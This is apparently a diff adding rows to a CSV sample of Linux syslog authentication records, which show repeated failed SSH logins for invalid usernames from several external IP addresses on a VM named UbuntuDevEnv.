+3810,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:23:40,UbuntuDevEnv,2019-06-26 13:23:40,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,124670,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3811,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:23:42,UbuntuDevEnv,2019-06-26 13:23:42,auth,UbuntuDevEnv,info,Failed password for invalid user teste from 157.230.115.27 port 41196 ssh2,124670,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,teste,157.230.115.2,41196,,
+3812,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:23:42,UbuntuDevEnv,2019-06-26 13:23:42,auth,UbuntuDevEnv,info,Disconnected from invalid user teste 157.230.115.27 port 41196 [preauth],124670,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,teste,157.230.115.2,41196,,
+3813,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:23:42,UbuntuDevEnv,2019-06-26 13:23:42,auth,UbuntuDevEnv,info,Received disconnect from 157.230.115.27 port 41196:11: Bye Bye [preauth],124670,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,157.230.115.2,41196,,
+3814,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:23:57,UbuntuDevEnv,2019-06-26 13:23:56,auth,UbuntuDevEnv,info,Invalid user oracle from 194.228.3.191 port 56388,124729,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oracle,194.228.3.1,56388,,
+3815,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:23:57,UbuntuDevEnv,2019-06-26 13:23:56,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=194.228.3.191,124729,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,194.228.3.1,,0,
+3816,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:23:57,UbuntuDevEnv,2019-06-26 13:23:56,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,124729,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3817,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:23:59,UbuntuDevEnv,2019-06-26 13:23:58,auth,UbuntuDevEnv,info,Failed password for invalid user oracle from 194.228.3.191 port 56388 ssh2,124729,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oracle,194.228.3.1,56388,,
+3818,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:23:59,UbuntuDevEnv,2019-06-26 13:23:58,auth,UbuntuDevEnv,info,Received disconnect from 194.228.3.191 port 56388:11: Bye Bye [preauth],124729,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,194.228.3.1,56388,,
+3819,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:23:59,UbuntuDevEnv,2019-06-26 13:23:58,auth,UbuntuDevEnv,info,Disconnected from invalid user oracle 194.228.3.191 port 56388 [preauth],124729,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oracle,194.228.3.1,56388,,
+3820,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:24:21,UbuntuDevEnv,2019-06-26 13:24:21,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,124812,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3821,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:24:21,UbuntuDevEnv,2019-06-26 13:24:21,auth,UbuntuDevEnv,info,Invalid user dl from 201.48.54.81 port 53420,124812,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dl,201.48.54.8,53420,,
+3822,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:24:21,UbuntuDevEnv,2019-06-26 13:24:21,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=201.48.54.81,124812,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,201.48.54.8,,0,
+3823,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:24:24,UbuntuDevEnv,2019-06-26 13:24:23,auth,UbuntuDevEnv,info,Failed password for invalid user dl from 201.48.54.81 port 53420 ssh2,124812,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dl,201.48.54.8,53420,,
+3824,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:24:24,UbuntuDevEnv,2019-06-26 13:24:24,auth,UbuntuDevEnv,info,Received disconnect from 201.48.54.81 port 53420:11: Bye Bye [preauth],124812,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,201.48.54.8,53420,,
+3825,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:24:24,UbuntuDevEnv,2019-06-26 13:24:24,auth,UbuntuDevEnv,info,Disconnected from invalid user dl 201.48.54.81 port 53420 [preauth],124812,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dl,201.48.54.8,53420,,
+3826,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:24:37,UbuntuDevEnv,2019-06-26 13:24:37,auth,UbuntuDevEnv,info,Invalid user write from 196.46.36.144 port 35840,124873,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,write,196.46.36.1,35840,,
+3827,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:24:37,UbuntuDevEnv,2019-06-26 13:24:37,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.46.36.144,124873,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.46.36.1,,0,
+3828,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:24:37,UbuntuDevEnv,2019-06-26 13:24:37,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,124873,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3829,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:24:40,UbuntuDevEnv,2019-06-26 13:24:39,auth,UbuntuDevEnv,info,Failed password for invalid user write from 196.46.36.144 port 35840 ssh2,124873,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,write,196.46.36.1,35840,,
+3830,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:24:40,UbuntuDevEnv,2019-06-26 13:24:39,auth,UbuntuDevEnv,info,Received disconnect from 196.46.36.144 port 35840:11: Bye Bye [preauth],124873,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.46.36.1,35840,,
+3831,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:24:40,UbuntuDevEnv,2019-06-26 13:24:39,auth,UbuntuDevEnv,info,Disconnected from invalid user write 196.46.36.144 port 35840 [preauth],124873,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,write,196.46.36.1,35840,,
+3832,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:24:44,UbuntuDevEnv,2019-06-26 13:24:43,auth,UbuntuDevEnv,info,Invalid user sklopaketboss from 139.199.34.112 port 51164,124899,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sklopaketboss,139.199.34.1,51164,,
+3833,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:24:44,UbuntuDevEnv,2019-06-26 13:24:43,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,124899,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3834,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:24:44,UbuntuDevEnv,2019-06-26 13:24:43,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.199.34.112,124899,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.199.34.1,,0,
+3835,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:24:46,UbuntuDevEnv,2019-06-26 13:24:45,auth,UbuntuDevEnv,info,Failed password for invalid user sklopaketboss from 139.199.34.112 port 51164 ssh2,124899,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sklopaketboss,139.199.34.1,51164,,
+3836,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:24:46,UbuntuDevEnv,2019-06-26 13:24:46,auth,UbuntuDevEnv,info,Disconnected from invalid user sklopaketboss 139.199.34.112 port 51164 [preauth],124899,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sklopaketboss,139.199.34.1,51164,,
+3837,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:24:46,UbuntuDevEnv,2019-06-26 13:24:46,auth,UbuntuDevEnv,info,Received disconnect from 139.199.34.112 port 51164:11: Bye Bye [preauth],124899,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.199.34.1,51164,,
+3838,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:25:31,UbuntuDevEnv,2019-06-26 13:25:30,auth,UbuntuDevEnv,info,Invalid user students from 194.228.3.191 port 36670,125065,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,students,194.228.3.1,36670,,
+3839,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:25:31,UbuntuDevEnv,2019-06-26 13:25:30,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=194.228.3.191,125065,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,194.228.3.1,,0,
+3840,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:25:31,UbuntuDevEnv,2019-06-26 13:25:30,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,125065,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3841,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:25:31,UbuntuDevEnv,2019-06-26 13:25:31,auth,UbuntuDevEnv,info,Invalid user webmail from 157.230.115.27 port 58560,125068,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,webmail,157.230.115.2,58560,,
+3842,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:25:31,UbuntuDevEnv,2019-06-26 13:25:31,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,125068,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3843,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:25:31,UbuntuDevEnv,2019-06-26 13:25:31,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.115.27,125068,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,157.230.115.2,,0,
+3844,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:25:33,UbuntuDevEnv,2019-06-26 13:25:32,auth,UbuntuDevEnv,info,Failed password for invalid user students from 194.228.3.191 port 36670 ssh2,125065,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,students,194.228.3.1,36670,,
+3845,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:25:33,UbuntuDevEnv,2019-06-26 13:25:32,auth,UbuntuDevEnv,info,Disconnected from invalid user students 194.228.3.191 port 36670 [preauth],125065,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,students,194.228.3.1,36670,,
+3846,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:25:33,UbuntuDevEnv,2019-06-26 13:25:32,auth,UbuntuDevEnv,info,Received disconnect from 194.228.3.191 port 36670:11: Bye Bye [preauth],125065,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,194.228.3.1,36670,,
+3847,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:25:34,UbuntuDevEnv,2019-06-26 13:25:33,auth,UbuntuDevEnv,info,Failed password for invalid user webmail from 157.230.115.27 port 58560 ssh2,125068,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,webmail,157.230.115.2,58560,,
+3848,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:25:34,UbuntuDevEnv,2019-06-26 13:25:33,auth,UbuntuDevEnv,info,Disconnected from invalid user webmail 157.230.115.27 port 58560 [preauth],125068,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,webmail,157.230.115.2,58560,,
+3849,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:25:34,UbuntuDevEnv,2019-06-26 13:25:33,auth,UbuntuDevEnv,info,Received disconnect from 157.230.115.27 port 58560:11: Bye Bye [preauth],125068,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,157.230.115.2,58560,,
+3850,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:26:18,UbuntuDevEnv,2019-06-26 13:26:17,auth,UbuntuDevEnv,info,Invalid user amandabackup from 201.48.54.81 port 33586,125230,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,amandabackup,201.48.54.8,33586,,
+3851,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:26:18,UbuntuDevEnv,2019-06-26 13:26:17,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=201.48.54.81,125230,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,201.48.54.8,,0,
+3852,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:26:18,UbuntuDevEnv,2019-06-26 13:26:17,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,125230,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3853,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:26:19,UbuntuDevEnv,2019-06-26 13:26:19,auth,UbuntuDevEnv,info,Failed password for invalid user amandabackup from 201.48.54.81 port 33586 ssh2,125230,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,amandabackup,201.48.54.8,33586,,
+3854,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:26:19,UbuntuDevEnv,2019-06-26 13:26:19,auth,UbuntuDevEnv,info,Disconnected from invalid user amandabackup 201.48.54.81 port 33586 [preauth],125230,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,amandabackup,201.48.54.8,33586,,
+3855,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:26:19,UbuntuDevEnv,2019-06-26 13:26:19,auth,UbuntuDevEnv,info,Received disconnect from 201.48.54.81 port 33586:11: Bye Bye [preauth],125230,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,201.48.54.8,33586,,
+3856,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:26:47,UbuntuDevEnv,2019-06-26 13:26:47,auth,UbuntuDevEnv,info,Invalid user eric from 139.199.34.112 port 38720,125338,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,eric,139.199.34.1,38720,,
+3857,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:26:47,UbuntuDevEnv,2019-06-26 13:26:47,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.199.34.112,125338,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.199.34.1,,0,
+3858,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:26:47,UbuntuDevEnv,2019-06-26 13:26:47,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,125338,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3859,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:26:49,UbuntuDevEnv,2019-06-26 13:26:48,auth,UbuntuDevEnv,info,Failed password for invalid user eric from 139.199.34.112 port 38720 ssh2,125338,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,eric,139.199.34.1,38720,,
+3860,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:26:49,UbuntuDevEnv,2019-06-26 13:26:49,auth,UbuntuDevEnv,info,Received disconnect from 139.199.34.112 port 38720:11: Bye Bye [preauth],125338,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.199.34.1,38720,,
+3861,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:26:49,UbuntuDevEnv,2019-06-26 13:26:49,auth,UbuntuDevEnv,info,Disconnected from invalid user eric 139.199.34.112 port 38720 [preauth],125338,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,eric,139.199.34.1,38720,,
+3862,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:27:04,UbuntuDevEnv,2019-06-26 13:27:03,auth,UbuntuDevEnv,info,Invalid user steven from 194.228.3.191 port 45192,125412,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,steven,194.228.3.1,45192,,
+3863,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:27:04,UbuntuDevEnv,2019-06-26 13:27:03,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,125412,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3864,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:27:04,UbuntuDevEnv,2019-06-26 13:27:03,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=194.228.3.191,125412,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,194.228.3.1,,0,
+3865,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:27:06,UbuntuDevEnv,2019-06-26 13:27:05,auth,UbuntuDevEnv,info,Failed password for invalid user steven from 194.228.3.191 port 45192 ssh2,125412,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,steven,194.228.3.1,45192,,
+3866,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:27:06,UbuntuDevEnv,2019-06-26 13:27:05,auth,UbuntuDevEnv,info,Received disconnect from 194.228.3.191 port 45192:11: Bye Bye [preauth],125412,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,194.228.3.1,45192,,
+3867,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:27:06,UbuntuDevEnv,2019-06-26 13:27:05,auth,UbuntuDevEnv,info,Disconnected from invalid user steven 194.228.3.191 port 45192 [preauth],125412,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,steven,194.228.3.1,45192,,
+3868,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:27:19,UbuntuDevEnv,2019-06-26 13:27:18,auth,UbuntuDevEnv,info,Invalid user teamspeak3 from 196.46.36.144 port 44007,125448,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,teamspeak3,196.46.36.1,44007,,
+3869,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:27:19,UbuntuDevEnv,2019-06-26 13:27:18,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,125448,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
